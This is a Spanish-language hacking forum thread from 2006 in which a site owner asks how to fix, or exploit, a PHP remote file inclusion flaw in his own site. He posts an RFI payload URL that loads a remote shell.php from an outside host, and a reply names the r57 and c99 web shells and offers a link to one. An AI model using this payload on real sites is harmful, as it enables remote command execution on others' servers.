Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 19, 2008, 04:58:30
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: AYUDA EXPLOID PHP / shell.php / include / rfi 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: AYUDA EXPLOID PHP / shell.php / include / rfi  (Leído 1051 veces)
mpino
Visitante
« en: Octubre 11, 2006, 10:34:45 »
Por azares del destino llegue a esta pagina ya que una persona amable me envio un correo indicandome las vulnerabilidaddes de mi webpage, llevo desde la manana hojeando su pagina, me dedico ala programacion media, avanzada en php, vb, asp ...solo que el campo de seguridad nunca ha sido mi fuerte bueno a lo que voy..


Esta persona me detecto la vulne 19543 (
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion ) ya he leeido varios tomeas donde se trata este punto pero mi bajo conocimiento a cerca del tema, me limito...

mis dudas son, como preevenir esta vulnerabilidad?

o bien como explotar la vulnerabilidad, se menciona un archivo shell.php ( que no he encontrado el fuente, o como elaborarlo ) Huh


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.otrapage.com/shell.php

ejecuto eso y no sucede nada alo que asumo ke necesito el file ese shell.php alguien podria pasarme o desplegar aqui el codigo.. o bien, cada quien creea lo que quiera en ese shell.php Huh osea podria ser mifile.php en vez de ese nombre y con codigo que yo quiera???

otra duda que es rfi?? no hay un diccioinario de terminos para ir familiarizando!

saludos
En línea
mpino
Visitante
« Respuesta #1 en: Octubre 11, 2006, 10:42:25 »
rfi ? read file inclusion, include jeje bueno creeo que tengo la idea, haber un sabio que me pueda orientar mas a cerca de mentado file " shell.php "
En línea
AvIadOR
Miembro
*****
Desconectado Desconectado

Mensajes: 107



Ver Perfil Email
« Respuesta #2 en: Octubre 11, 2006, 10:46:00 »
la solucion esta en la misma pagina:

The vendor has released a fix to address these issues. Please see the reference section for details, de ahi te vas a reference y ya.


RFI: significa Remote File Inclusion y la shell.php no es un archivo cualquiera es un interprete de comandos, las mas comunes son la r57 y la c99, para explotar tu vulnerabilidad ocupas una  de esas jeje

aca te dejo la r57

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion pa' que te des una idea
« Última modificación: Octubre 11, 2006, 10:50:21 por aviador89 » En línea
"Es mejor estar aqui abajo deseando estar alla arriba, que estar alla arriba deseando estar aqui abajo"
mpino
Visitante
« Respuesta #3 en: Octubre 11, 2006, 11:19:56 »
En línea
mpino
Visitante
« Respuesta #4 en: Octubre 11, 2006, 11:23:17 »
SIGO EN LAS MISMAS NO LOGRO FIXEAR EL BUG.. ALGUIEN K ME PROPORCIONE EL FILE SHELL PARA ACLARAR MIS IDEAS...


supongamos ke hiciera un rfi de algun otro acrhivo.. pejemplo un test.php ke solo contenga una cadena de caractreres... se deberia de mostrar en la pagina k estoy intentando o que?? saludos
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: AYUDA EXPLOID PHP / shell.php / include / rfi « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC